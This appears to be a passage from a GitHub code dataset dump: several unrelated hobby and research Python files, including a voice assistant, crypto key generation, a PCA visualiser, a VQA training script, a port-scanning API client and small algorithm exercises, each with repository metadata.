0<=hour<12:\n speak(\"Good Morning, Sir\")\n elif 12<=hour<18:\n speak(\"Good Afternoon, Sir\")\n else:\n speak(\"Good Evening, Sir\")\n speak(\"I'm virtual assistant!\")\n speak(\"I can help you to put email to your friend, I can answer your any question, Tell me to open browser or Office software, it is not only this, I can do more than this.\")\n speak(\"Hi Sir, I'm Aprth, How can I help you?\")\n\n\ndef takecommand():\n #take commmad from microphones and returns string\n r = sr.Recognizer()\n # if text in response:\n with sr.Microphone() as source:\n print(\"Listening...\")\n r.pause_threshold = 0.8\n r.energy_threshold = 850\n audio = r.listen(source)\n\n try:\n print(\"Recognizing...\")\n query = r.recognize_google(audio, language=\"gu-in\")\n query = r.recognize_google(audio, language=\"en-in\")\n print(f\"You said: {query}\\n\")\n except Exception as e:\n print(\"Can't get it, Can you be specific ?\")\n return \"None\"\n return query\n\n\nif __name__ == '__main__':\n WishMe()\n flag = True\n while flag:\n query = takecommand().lower()\n try:\n if \"wikipedia\" in query:\n speak(\"Searching Wikipedia...\")\n query = query.replace(\"wikipedia\",'')\n answer = wikipedia.summary(query,sentences=3)\n speak(\"According to My Data...\")\n print(answer)\n speak(answer)\n\n if \"who is\" in query:\n speak(\"Searching Wikipedia...\")\n query = query.replace(\"who is\",'')\n answer = wikipedia.summary(query,sentences=3)\n speak(\"According to My Data...\")\n print(answer)\n speak(answer)\n\n if \"tell me about\" in query:\n speak(\"Searching Wikipedia...\")\n query = query.replace(\"tell me about\",'')\n answer = wikipedia.summary(query,sentences=3)\n speak(\"According to My Data...\")\n print(answer)\n speak(answer)\n except:\n pass\n if 'open' in query:\n query = query.replace('open ','')\n webbrowser.open(query+\".com\")\n\n if 'search google' in query:\n query = query.replace('search google ','')\n os.system(f\"start \\\"\\\" https://www.google.com/search?q={query}&source=lnms&tbm=nws\")\n\n if 'google' in query:\n query = query.replace('google ','')\n print(query)\n os.system(f\"start \\\"\\\" https://www.google.com/search?q={query}&source=lnms&tbm=nws\")\n\n if 'youtube' in query:\n query = query.replace('youtube ','')\n os.system(f\"start \\\"\\\" https://www.youtube.com/results?search_query={query}\")\n\n if 'say about' in query:\n query = query.replace('say about ','')\n webbrowser.open(query+\".com\")\n\n if 'play music' in query:\n music_dir = \"enter your music directory path\"\n song = os.listdir(music_dir)\n os.startfile(os.path.join(music_dir,song[0]))\n\n if 'time' in query:\n strtime = datetime.datetime.now().strftime(\"%H:%M:%S\")\n print(strtime)\n speak(f\"Sir, The Time is {strtime}\")\n\n if 'show me powerpoint' in query:\n path = \"C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\POWERPNT.EXE\"\n os.startfile(path)\n\n if 'show me firefox' in query:\n path = \"C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\"\n os.startfile(path)\n\n if 'show me movie' in query:\n path = \"Enter movie's absolute path here\"\n os.startfile(path)\n\n \n\n if 'goodbye' in query:\n speak(\"Goodbye Sir, Nice to talk you, meet you soon!\")\n flag = False\n","repo_name":"parth2050/Voice_assistant","sub_path":"code/voice_assist.py","file_name":"voice_assist.py","file_ext":"py","file_size_in_byte":4206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4594018069","text":"import os\r\nos.system(\"cls\")\r\n\r\n#Datos de entrada:\r\ntotalCompra = float(input(\"Monto total de la compra ($): \"))\r\n\r\n#Proceso: Evaluar totalCompra y luego determinar el préstamo y fondo propio.\r\nif totalCompra > 5000:\r\n prestamo = 30 / 100 * totalCompra\r\nelse: prestamo = 20 / 100 * totalCompra\r\n\r\ninteres = 10 / 100 * prestamo\r\npropio = totalCompra - prestamo\r\n\r\n#Resultado:\r\nprint(\"-----Pagos-----\")\r\nprint(f'Préstamo Banco : {prestamo:.2f} soles')\r\nprint(f'Fondos propios : {propio:.2f} soles')\r\nprint(\"-----Gastos-----\")\r\nprint(f'Intereses bancarios: {interes:.2f} soles')","repo_name":"LeoEstaProgramando/Varios","sub_path":"02.Problemas-EstructurasCondicionales/26.py","file_name":"26.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"1549817765","text":"import os\nimport logging\n\nfrom cryptography.hazmat.primitives import padding\nfrom cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nfrom cryptography.hazmat.primitives.asymmetric import rsa, padding\nfrom cryptography.hazmat.primitives import hashes\n\n\nlogger = logging.getLogger()\nlogger.setLevel('INFO')\n\n\ndef generate_asym_data() -> tuple:\n \"\"\"\n Функция генерирует ключи для асимметричного шифрования\n :return: закрытый ключ и открытый ключ\n \"\"\"\n keys = rsa.generate_private_key(public_exponent=65537, key_size=2048)\n secret_key = keys\n public_key = keys.public_key()\n logging.info(' Key generated for asymmetric encryption')\n return secret_key, public_key\n\n\ndef generate_sym_data(len: int) -> str:\n \"\"\"\n Функция генерирует ключ для симметричного шифрования\n :param len: длина ключа\n :return: ключ \n \"\"\"\n key = None\n choices = [128, 192, 256]\n if len in choices:\n key = os.urandom(int(len / 8))\n logging.info(' Symmetric encryption key generated')\n else:\n logging.warning(' The length of the key is not in choices: {}'.format(choices))\n raise ValueError(f'The length of the key {len} is not allowed')\n return key ","repo_name":"PolinaKrp/isb-3","sub_path":"scripts/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"ru","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"10905328494","text":"# Uses python3\r\ncount = 0\r\n\r\ndef merge_sort(a):\r\n if len(a) == 1:\r\n return a\r\n \r\n m = len(a) // 2\r\n \r\n b = merge_sort(a[:m])\r\n c = merge_sort(a[m:])\r\n \r\n return merge(b, c)\r\n \r\ndef merge(b, c):\r\n d = []\r\n \r\n while b and c:\r\n if b[0] <= c[0]:\r\n d.append(b[0])\r\n del b[0]\r\n else:\r\n d.append(c[0])\r\n del c[0]\r\n increment_count(len(b))\r\n \r\n d.extend(b)\r\n d.extend(c)\r\n \r\n return d\r\n\r\ndef increment_count(n):\r\n global count\r\n count = count + n\r\n \r\nif __name__ == '__main__':\r\n a = list(map(int, input().split()))\r\n merge_sort(a)\r\n print(count)","repo_name":"rcurran1221/Algorithmic_Toolbox","sub_path":"merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33684401677","text":"import os\nfrom os.path import join\nfrom os import makedirs\nfrom itertools import product\nfrom time import sleep\nfrom math import pi\nimport numpy as np\n\nfrom psbody.mesh import Mesh, MeshViewer\nfrom psbody.mesh.sphere import Sphere\nfrom psbody.mesh.colors import name_to_rgb\n\nimport humplate.config as cg\nfrom humplate.utils.bone_tools import get_plane_frames_from_humerus\nfrom humplate.utils.draw import plane_frames_2_mesh_lines\nfrom humplate.utils.geometry import rotate\nimport humplate.templates.bone_annotation as ba\n\nimport argparse\nimport logging\n\nlogging.basicConfig(level=logging.INFO)\n\n\ndef _create_cage(vs, radius=1e-2):\n ''' Given an array of 3d vertices, it creates a *cage* containing all given vertices inside.\n The output are a set of spheres with the \"corners\" of the bounding box of the points.\n \n :param vs: an array of 3d points\n :returns: an array of eight spheres, creating a *cage*\n '''\n\n return([Sphere(np.asarray(corner), radius=radius).to_mesh()\n for corner in product(*zip(vs.min(axis=0), vs.max(axis=0)))])\n\n\ndef _create_cage_from_meshes(meshes, radius=1e-2):\n ''' Given an iterable with meshes, their vertices are concatenated\n and a cage is created using :func:`create_cage`.\n\n :param meshes: an iterable with meshes\n :type meshes: Mesh\n :returns: an array of eight spheres, creating a *cage*\n\n .. seealso:: :func:`create_cage`\n '''\n \n cage_v = np.zeros([0, 3])\n for m in meshes:\n cage_v = np.vstack((cage_v, m.v))\n\n return _create_cage(cage_v, radius=radius)\n\n\ndef visualize_pca_space(B, M, f, output_dir, annotation_filename='', heatmap=False, anatomical_annotation_mesh=False):\n '''\n Move across principal components and visualize\n :param B: Basis vectors\n :param M: Mean vector\n :param f: Faces of the template mesh\n :param output_dir: Folder containing the snapshots\n :return:\n '''\n print('Saving pca space visualization at ' + output_dir)\n\n if os.path.exists(output_dir):\n from shutil import rmtree\n rmtree(output_dir)\n # raise IOError('Output directory' + output_dir + ' already exists!')\n makedirs(output_dir)\n\n mv = MeshViewer()\n mv.set_background_color(np.asarray([1.0, 1.0, 1.0]))\n\n # camera orientations\n if not heatmap:\n camera_orientations = {\n 'top': [pi / 2, 0, 0.], \n 'side': [pi, 0., pi], \n 'front': [0., pi / 2, 0.],\n }\n else :\n camera_orientations = {\n 'side': [pi/2, 0, 0.], \n 'head': [pi/5, 0, 0], \n 'front': [0., pi / 2, 0.],\n }\n\n\n step = 0.2\n limits = [-2., 2.]\n colors = ['bisque', 'lavender', 'honeydew', 'gray']\n\n\n for ci, orientation in enumerate(camera_orientations):\n if not os.path.exists(os.path.join(output_dir, orientation)):\n makedirs(os.path.join(output_dir, orientation))\n\n mean_shape = Mesh(v=rotate(M, camera_orientations[orientation]))\n img_num = 0\n\n # iterate over pca components\n for b in range(3): # B.shape[0]):\n mv.set_background_color(name_to_rgb[colors[b % len(colors)]])\n\n # collect all the meshes to generate a cage (to avoid zoom effects in the viewer)\n meshes = []\n lines = []\n for k in (list(np.arange(limits[0], limits[1], step)) + list(np.arange(limits[1], limits[0], -step))) :\n m = Mesh(v=M + k * B[:, :, b], f=f, vc=[0.7, 0.7, 0.7])\n\n if anatomical_annotation_mesh:\n m.vc=anatomical_annotation_mesh.vc\n if annotation_filename and args.heatmap:\n annotated_points = ba.apply_annotations(m, annotation_filename)\n _, rms_dico = ba.compute_local_frame_lines(annotated_points)\n if heatmap :\n ba.annotate_heatmap(m, annotated_points, rms_dico)\n plane_dict = get_plane_frames_from_humerus(annotated_points, m)\n mesh_lines = plane_frames_2_mesh_lines(plane_dict)\n\n for l in mesh_lines:\n l.v = rotate(l.v, camera_orientations[orientation])\n lines.append(mesh_lines)\n m.v = rotate(m.v, camera_orientations[orientation])\n meshes.append(m)\n\n\n mv.static_meshes = _create_cage_from_meshes(meshes, radius=0.0005)\n\n # iterate over steps of std dev\n for i, m in enumerate(meshes):\n if not heatmap:\n mv.dynamic_meshes = [m] + [mean_shape]\n else:\n mv.dynamic_meshes = [m]\n if len(lines)==len(meshes):\n mv.set_dynamic_lines(lines[i])\n sleep(0.02)\n\n mv.save_snapshot(blocking=True, path=join(output_dir, orientation, '{n:03d}.png'.format(n=img_num)))\n img_num += 1\n\n # Generate a video from the saved frames\n cmd_orientation = 'ffmpeg -i {1}/%03d.png -vcodec h264 -pix_fmt yuv420p -r 30 -an -b:v 5000k {2}.mp4'.format(20, join(output_dir, orientation), join(output_dir, orientation))\n print(cmd_orientation)\n\n cmd = ['ffmpeg', '-framerate', '20', '-i', '{0}/%03d.png'.format(join(output_dir, orientation)), '-vcodec',\n 'h264', '-pix_fmt', 'yuv420p', '-r', '30', '-an', '-b:v', '5000k', '{0}.mp4'.format(join(output_dir, orientation))]\n\n print(cmd)\n from subprocess import call\n call(cmd)\n\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-b\", \"--bone_id\", help=\"the bone ID to work with\", default='humerus', type=str)\n parser.add_argument(\"-H\", \"--heatmap\", action='store_true', help='Fit a plate to the fixation area and show the distance to this plane')\n parser.add_argument(\"-A\", \"--anat\", action='store_true', help='Paint the meshes with the anatomical zones anotations')\n\n args = parser.parse_args()\n\n output_filename = cg.humerus_template\n pca_filename = cg.humerus_pca \n\n # Load the PCA\n from pickle import load\n pca_dict = load(open(pca_filename, 'rb'), encoding='latin1')\n B = pca_dict['B']\n M = pca_dict['M']\n\n faces = Mesh(filename=output_filename).f\n\n video_output_dir = os.path.join(cg.output_folder, 'pca_video')\n makedirs(video_output_dir, exist_ok=True)\n\n if args.heatmap:\n video_output_dir = os.path.join(video_output_dir, 'planes_heatmap')\n anatomical_annotation_mesh = False\n elif args.anat:\n anatomical_annotation_mesh = Mesh(filename=cg.anatomical_annotation_mesh)\n video_output_dir = os.path.join(video_output_dir, 'anatomic')\n else :\n video_output_dir = os.path.join(video_output_dir, 'pca_space')\n anatomical_annotation_mesh = False\n\n makedirs(video_output_dir, exist_ok=True)\n\n visualize_pca_space(B, M, faces, output_dir=video_output_dir, annotation_filename=cg.template_annotation,\n heatmap=args.heatmap, anatomical_annotation_mesh=anatomical_annotation_mesh)\n \n print('Videos saved at ' + video_output_dir)","repo_name":"MarilynKeller/HumerusPlate","sub_path":"demos/plot_pca.py","file_name":"plot_pca.py","file_ext":"py","file_size_in_byte":7135,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"8644996671","text":"import spacy\nimport numpy as np\nimport collections\nimport operator\nimport json\n\nfrom utils import preprocess_data, topKFrequentAnswer, getVoc, ltocsv, csvtol\nfrom features_processor import question_features, batch, atot, qtot, itot, getEmbeddings, qtotIndex\n\n\nprint('loading datas...')\n# Load the training data\ndata_question = json.load(open('Questions/OpenEnded_mscoco_train2014_questions.json')) # remove v2_\ndata_answer = json.load(open('Annotations/mscoco_train2014_annotations.json')) # remove v2_\n\n# load the validation data\ndata_qval = json.load(open('Questions/OpenEnded_mscoco_val2014_questions.json')) # remove v2_\ndata_aval = json.load(open('Annotations/mscoco_val2014_annotations.json')) # remove v2_\nprint('data loaded')\n\n\nK_train_dict, K_val_dict, topKAnswers = topKFrequentAnswer(data_question, data_answer, data_qval, data_aval)\n\nK_images_id, K_questions_id, K_questions, K_questions_len, K_answers = K_train_dict['images_id'], K_train_dict['questions_id'], K_train_dict['questions'], K_train_dict['questions_len'], K_train_dict['answers']\nK_images_val_id, K_questions_val_id, K_questions_val, K_questions_val_len, K_answers_val = K_val_dict['images_id'], K_val_dict['questions_id'], K_val_dict['questions'], K_val_dict['questions_len'], K_val_dict['answers']\n\nvocabulary = getVoc(K_questions, K_questions_val)\nembedding_matrix = getEmbeddings(vocabulary)\n\n# ----------------------------------------- Create the model ----------------------------------------- #\n\nimg_dim = 2048 # TODO: change for 4096\nword2vec_dim = 300\nhidden_layers = 2\n\nmerge_hidden_units = 1024\nq_hidden_units = 512\nmlp_hidden_units = 1000\n\nvoc_size = len(vocabulary) # number of unique words from training + validation questions\nmax_len = max(max(K_questions_len), max(K_questions_val_len)) + 1 # max number of words per question\ndropout = 0.5\nactivation = 'tanh'\nnb_classes = len(topKAnswers) # 1000\n\nfrom random import shuffle\nfrom keras import optimizers\nfrom keras.models import Sequential, Model\nfrom keras.layers.core import Dense, Dropout, Activation\nfrom keras.layers.recurrent import LSTM\nfrom keras.layers import multiply\nfrom keras import regularizers\n\nfrom keras.layers import *\n\n# image model\ni_model = Sequential()\ni_model.add(Dense(merge_hidden_units, input_shape=(img_dim,)))\ni_model.add(Activation(activation))\n#i_model.add(Dropout(dropout))\n\n\n# question model\nq_model = Sequential()\nq_model.add(Embedding(voc_size, word2vec_dim, weights=[embedding_matrix], input_length=max_len, trainable=False))\nq_model.add(LSTM(units=q_hidden_units, return_sequences=True, input_shape=(max_len, word2vec_dim)))\nq_model.add(Dropout(dropout))\nq_model.add(LSTM(q_hidden_units, return_sequences=False))\nq_model.add(Dropout(dropout))\nq_model.add(Dense(merge_hidden_units))\nq_model.add(Activation(activation))\n\n\n# Merging\n# add embedding\nmerge_model = Multiply()([i_model.output, q_model.output])\nfor i in range(hidden_layers):\n merge_model = (Dense(mlp_hidden_units,))(merge_model)\n merge_model = (Activation(activation))(merge_model)\n merge_model = (Dropout(dropout))(merge_model)\n\nmerge_model = (Dense(nb_classes,))(merge_model)\nmerge_model = (Activation('softmax'))(merge_model)\n\nmodel = Model([q_model.input, i_model.input], merge_model)\n\nrmsprop = optimizers.RMSprop(lr=3e-4, rho=0.9, epsilon=1e-08, decay=1-0.99997592083) # 0.99\n#adam = optimizers.Adam(lr=4e-4, beta_1=0.8, beta_2=0.999, epsilon=1e-08, decay=1-0.99)\nmodel.compile(loss='categorical_crossentropy', optimizer=rmsprop, metrics=['accuracy'])\n# -----------------------------------------Training the model ----------------------------------------- #\n\nfrom keras.utils import generic_utils\nfrom sklearn import preprocessing\n\n# number of epochs that you would like to use to train the model.\nepochs = 12\n\n# batch size\nbatch_size = 128\n\n# save value of training, validation loss and accuracy in lists\nimport cb\n\nlabelencoder = preprocessing.LabelEncoder()\nlabelencoder.fit(topKAnswers)\n\n#val_size = len(K_images_val_id)\nsamples_train = int(len(K_questions) / batch_size)\nsamples_val = int(len(K_questions_val) / batch_size)\n\nprint('start training...')\ndef generator(isTrain, batch_size):\n\ti = 0\n\tl = len(K_questions)\n\tlv = len(K_questions_val)\n\twhile 1:\n\t\tif (isTrain):\n\t\t\t# preprocess the datas\n\t\t\t# X_batch_q = qtot(K_questions[i:min(i + batch_size, l)], max_len)\n\t\t\tX_batch_q = qtotIndex(K_questions[i:min(i + batch_size, l)], vocabulary, max_len)\n\t\t\tX_batch_i = itot(K_images_id[i:min(i + batch_size, l)])\n\n\t\t\t# l2 normalize images\n\t\t\tX_batch_i = X_batch_i / np.linalg.norm(X_batch_i, axis=1).reshape(-1,1)\n\n\t\t\tY_batch = atot(K_answers[i:min(i + batch_size, l)], labelencoder)\n\t\telse:\n\t\t\t# preprocess the datas\n\t\t\t# X_batch_q = qtot(K_questions_val[i:min(i + batch_size, l)], max_len)\n\t\t\tX_batch_q = qtotIndex(K_questions_val[i:min(i + batch_size, l)], vocabulary, max_len)\n\t\t\tX_batch_i = itot(K_images_val_id[i:min(i + batch_size, l)])\n\n\t\t\t# l2 normalize images\n\t\t\tX_batch_i = X_batch_i / np.linalg.norm(X_batch_i, axis=1).reshape(-1,1)\n\n\t\t\tY_batch = atot(K_answers_val[i:min(i + batch_size, l)], labelencoder)\n\n\t\tyield [X_batch_q, X_batch_i], Y_batch\n\n\t\ti += batch_size\n\n\t\tif isTrain and i > l:\n\t\t\ti = 0\n\t\tif not isTrain and i > lv:\n\t\t\ti = 0\n\n# prepare my callbacks (save train, val acc/loss in lists)\nhistories = cb.Histories()\n\nfrom keras.callbacks import ModelCheckpoint\ncheckpointer = ModelCheckpoint(filepath='weights/LSTMQ_I/resnet_weights.{epoch:02d}-{val_loss:.2f}.hdf5', verbose=1, save_best_only=False) # TODO: delete resnet_\nmodel.fit_generator(generator(True, batch_size=batch_size), steps_per_epoch = samples_train, nb_epoch=epochs,\n\t\t\t\t\tvalidation_data=generator(False, batch_size=batch_size),\n\t\t\t\t\tcallbacks=[checkpointer, histories], validation_steps=samples_val)\n\n# save validation, training acc/loss to csv files (to print result without retraining all the model from scratch)\nltocsv(histories.train_loss, 'histories/LSTMQ_I/resnet_train_loss.csv') # delete resnet_\nltocsv(histories.val_loss, 'histories/LSTMQ_I/resnet_val_loss.csv')\nltocsv(histories.train_acc, 'histories/LSTMQ_I/resnet_train_acc.csv')\nltocsv(histories.val_acc, 'histories/LSTMQ_I/resnet_val_acc.csv')","repo_name":"Twice22/VQA","sub_path":"LSTMQ_I.py","file_name":"LSTMQ_I.py","file_ext":"py","file_size_in_byte":6155,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"14856034507","text":"import logging\nfrom .rest_adapter import RestAdapter\nfrom .models import *\n\n\nclass EffluxAPI:\n \"\"\" Main API Class\n \"\"\"\n def __init__(self, hostname: str = 'api.effluxio.com/api', api_key: str = '', ver: str = 'v2', ssl_verify: bool = True, logger: logging.Logger = None):\n \"\"\"__init__ \n\n Args:\n hostname (str, optional): API hostname. Defaults to 'api.effluxio.com/api'.\n api_key (str, optional): API Key. Defaults to ''.\n ver (str, optional): API Version. Defaults to 'v2'.\n ssl_verify (bool, optional): Verify SSL. Defaults to True.\n logger (logging.Logger, optional): Debug logging. Defaults to None.\n \"\"\"\n self._rest_adapter = RestAdapter(\n hostname, api_key, ver, ssl_verify, logger)\n\n def post_scan(self, hosts: list = ['8.8.8.8'], ports: list = [\"top_10\", \"23\", \"135\", \"139\", \"5900\"], fingerprint: int = 1, protocol: str = \"tcp\") -> Scan:\n \"\"\"post_scan POST request to scan endpoint\n\n Args:\n hosts (list, optional): Hosts to scan. Defaults to ['8.8.8.8'].\n ports (list, optional): Ports to scan. Defaults to [\"top_10\", \"23\", \"135\", \"139\", \"5900\"].\n fingerprint (int, optional): Fingerprinting level - 0:open, 1:banner, 2:identify services. Defaults to 1.\n protocol (str, optional): Scan protocol - tcp/udp. Defaults to \"tcp\".\n\n Returns:\n Scan: Scan object\n \"\"\"\n scan_data = {\n \"hosts\": hosts,\n \"ports\": ports,\n \"proto\": protocol,\n \"fingerprint\": fingerprint\n }\n _, _, data = self._rest_adapter.POST(endpoint='/scans', data=scan_data)\n return Scan.from_dict(data)\n \n def post_scan_repeat(self, job: str) -> Scan:\n \"\"\"post_scan_repeat Repeats scan based on jobid\n\n Args:\n job (str): previously run job_id you want to run\n\n Returns:\n Scan: Scan Object\n \"\"\"\n endpoint = \"/scans/repeat/\" + job\n _, _, data = self._rest_adapter.POST(endpoint=endpoint)\n return Scan.from_dict(data)\n \n def get_scans(self, count: int = 10) -> list[Scan]:\n \"\"\"get_scans Get list of n historical user scans\n\n Args:\n count (int): Number of scans to return. Defaults to 10.\n\n Returns:\n scans: Returns list of previous n scans in list[Scan] format\n \"\"\"\n endpoint = \"/scans?count=\" + str(count)\n _, _, data = self._rest_adapter.GET(endpoint=endpoint)\n scans: list[Scan] = []\n for scan in data:\n scans.append(Scan.from_dict(scan))\n return scans\n \n def get_scan_job(self, job: str, details: bool = True) -> Scan:\n \"\"\"get_scan_job GET request to scan endpoint to get details about a scan.\n\n Args:\n job (str): Job ID\n details (bool, optional): Whether to return the scan result details. Defaults to True.\n\n Returns:\n Scan: Scan Object\n \"\"\"\n endpoint = \"/scans/\" + job + \"?details=\" + str(details)\n _, _, data = self._rest_adapter.GET(endpoint=endpoint)\n return Scan.from_dict(data)\n \n def get_scan_status(self, job: str) -> str:\n \"\"\"get_scan_status _summary_\n\n Args:\n job (str): Job ID\n\n Returns:\n str: Returns scan status as a string - \"pending\",\"in progress\", \"complete\"\n \"\"\"\n scan = self.get_scan_job(job=job,details=False)\n return str(scan.status)\n \n def get_scan_results(self, job: str, details: bool = True):\n \"\"\"get_scan_results _summary_\n\n Args:\n job (str): Job ID\n details (bool, optional): Whether to return the scan result details. Defaults to True.\n\n Returns:\n _type_: Returns result variable - [dict[str, IP]]\n \"\"\"\n scan = self.get_scan_job(job=job,details=details)\n return scan.results\n","repo_name":"TylerBoire/efflux","sub_path":"efflux/efflux_api.py","file_name":"efflux_api.py","file_ext":"py","file_size_in_byte":3951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8467378805","text":"import numpy as np\nimport onnx\nimport onnx.numpy_helper as np_helper\nfrom onnx import TensorProto, helper\nfrom pkgutil import get_data\n\nimport qonnx.core.onnx_exec as oxe\nfrom qonnx.core.datatype import DataType\nfrom qonnx.core.modelwrapper import ModelWrapper\nfrom qonnx.transformation.general import GiveReadableTensorNames, GiveUniqueNodeNames\nfrom qonnx.transformation.infer_data_layouts import InferDataLayouts\nfrom qonnx.transformation.infer_datatypes import InferDataTypes\nfrom qonnx.transformation.infer_shapes import InferShapes\nfrom qonnx.transformation.merge_onnx_models import MergeONNXModels\nfrom qonnx.util.basic import qonnx_make_model\n\n\ndef test_merge_onnx_models():\n # load pre model\n raw_m = get_data(\"qonnx.data\", \"onnx/mnist-conv/model.onnx\")\n model1 = ModelWrapper(raw_m)\n # the input for model1 comes from a uint8 vector so we set the finn datatype\n # of the input tensor to DataType[\"UINT8\"] to verify that the datatypes are\n # correctly preserved in the transformed model\n model1.set_tensor_datatype(model1.graph.input[0].name, DataType[\"UINT8\"])\n model1 = model1.transform(InferShapes())\n model1 = model1.transform(GiveUniqueNodeNames())\n model1 = model1.transform(GiveReadableTensorNames())\n\n # set up post model\n shape = [1, 10]\n inp = helper.make_tensor_value_info(\"inp\", TensorProto.FLOAT, shape)\n a0 = helper.make_tensor_value_info(\"a0\", TensorProto.FLOAT, [])\n a1 = helper.make_tensor_value_info(\"a1\", TensorProto.FLOAT, [])\n outp = helper.make_tensor_value_info(\"outp\", TensorProto.FLOAT, shape)\n\n mul_node = helper.make_node(\"Mul\", [\"inp\", \"a0\"], [\"mul_out\"])\n div_node = helper.make_node(\"Div\", [\"mul_out\", \"a1\"], [\"outp\"])\n\n graph = helper.make_graph(\n nodes=[mul_node, div_node],\n name=\"model2-graph\",\n inputs=[inp],\n outputs=[outp],\n value_info=[a0, a1],\n )\n\n exp_opset_id = 13\n model2 = qonnx_make_model(graph, producer_name=\"model2\", opset_imports=[helper.make_opsetid(\"\", exp_opset_id)])\n model2 = ModelWrapper(model2)\n # initialize model2\n a0_value = np.random.uniform(low=0, high=1, size=(1)).astype(np.float32)\n model2.set_initializer(\"a0\", a0_value)\n a1_value = np.random.uniform(low=0.1, high=1, size=(1)).astype(np.float32)\n model2.set_initializer(\"a1\", a1_value)\n # set a dummy sparsity annotation to check if it gets correctly transferred\n # to the merged model\n sparsity = {\"dw\": {\"kernel_shape\": [0, 0]}}\n model2.set_tensor_sparsity(\"a1\", sparsity)\n model2 = model2.transform(InferShapes())\n model2 = model2.transform(InferDataTypes())\n model2 = model2.transform(InferDataLayouts())\n model2 = model2.transform(GiveUniqueNodeNames())\n model2 = model2.transform(GiveReadableTensorNames())\n\n # simulate the models before the merging and pass the output of model1 to model2\n # load one of the test vectors\n raw_i = get_data(\"qonnx.data\", \"onnx/mnist-conv/test_data_set_0/input_0.pb\")\n inp_values = onnx.load_tensor_from_string(raw_i)\n inp_values = np_helper.to_array(inp_values)\n idict = {model1.graph.input[0].name: inp_values}\n odict = oxe.execute_onnx(model1, idict)\n temp = odict[model1.graph.output[0].name]\n\n idict = {model2.graph.input[0].name: temp}\n odict = oxe.execute_onnx(model2, idict)\n outp = odict[model2.graph.output[0].name]\n # merge models\n model_transformed = model2.transform(MergeONNXModels(model1))\n\n idict = {model_transformed.graph.input[0].name: inp_values}\n odict = oxe.execute_onnx(model_transformed, idict)\n outp_transformed = odict[model_transformed.graph.output[0].name]\n\n assert (outp == outp_transformed).all()\n assert len(model_transformed.graph.node) == len(model1.graph.node) + len(model2.graph.node)\n # to test if the value is preserved we set the sparsity annotation of input[1]\n # of the division block to a dummy value, we can now look for the division block\n # and check if the sparsity annotation is still the same\n for n in model_transformed.graph.node:\n if n.op_type == \"Div\":\n tensor_name = n.input[1]\n set_sparsity = model_transformed.get_tensor_sparsity(tensor_name)\n assert sparsity == set_sparsity\n\n # check if finn datatype of graph.input[0] is still set to UINT8\n assert model_transformed.get_tensor_datatype(\"global_in\") == DataType[\"UINT8\"]\n # check that the merged model uses the greater of the two input opsets\n assert model_transformed.model.opset_import[0].version == exp_opset_id\n","repo_name":"fastmachinelearning/qonnx","sub_path":"tests/transformation/test_merge_onnx_models.py","file_name":"test_merge_onnx_models.py","file_ext":"py","file_size_in_byte":4547,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"48"} +{"seq_id":"72225707025","text":"from math import sqrt\ndef nextSqure(n):\n # 함수를 완성하세요\n x='no'\n if int(sqrt(n))==sqrt(n):\n x=(sqrt(n)+1)**2\n return x\n\n# 아래는 테스트로 출력해 보기 위한 코드입니다.\nprint(\"결과 : {}\".format(nextSqure(1036355)));","repo_name":"youngstone89/python-algorithm-training","sub_path":"nextSquare.py","file_name":"nextSquare.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8252684439","text":"board = [[0, 0, 0, 0, 0], [0, 0, 1, 0, 3], [0, 2, 5, 0, 1], [4, 2, 4, 4, 2], [3, 5, 1, 3, 1]]\nmoves = [1, 5, 3, 5, 1, 2, 1, 4]\n\nbasket = []\nanswer = 0\nfor i in moves:\n for j in range(len(board)):\n if board[j][i-1] != 0:\n basket.append(board[j][i-1])\n if len(basket) >= 2:\n if basket[len(basket)-2] == basket[len(basket)-1]:\n del basket[len(basket)-2]\n del basket[len(basket)-1]\n answer += 2\n board[j][i-1] = 0\n break\n\n\nprint(basket)\nprint(board)\nprint(answer)\n","repo_name":"pjjoy/python","sub_path":"study_homeworks/hyunjae/algorithm/level1/Exercise01_pickdoll.py","file_name":"Exercise01_pickdoll.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8324095955","text":"# Author: Wenfeng Du\r\n# Create Date: 2019-08-01\r\n# -*- coding: utf-8 -*-\r\n\r\nimport urllib.request\r\nimport requests\r\nimport json\r\nimport base64\r\nimport re\r\n\r\nclass AILogic:\r\n \"\"\"\r\n 从百度AI的API解释图片并返回识别结果\r\n \"\"\"\r\n\r\n def get_baidutoken(self, client_id, client_secret):\r\n \"\"\"\r\n 通过客户ID和客户密码获得token\r\n :param client_id:\r\n :param client_secret:\r\n :return:\r\n \"\"\"\r\n # client_id 为官网获取的AK, client_secret 为官网获取的SK\r\n host = 'https://aip.baidubce.com/oauth/2.0/token?' + \\\r\n 'grant_type=client_credentials&client_id=' + client_id + '&client_secret=' + client_secret\r\n request = urllib.request.Request(host)\r\n request.add_header('Content-Type', 'application/json; charset=UTF-8')\r\n response = urllib.request.urlopen(request)\r\n content = response.read()\r\n access_token = json.loads(content)['access_token']\r\n self.access_token = access_token\r\n\r\n def img_tobase64(self, img_name):\r\n \"\"\"\r\n 图片转换成64位\r\n :param img_name:图片名称\r\n :return:\r\n \"\"\"\r\n with 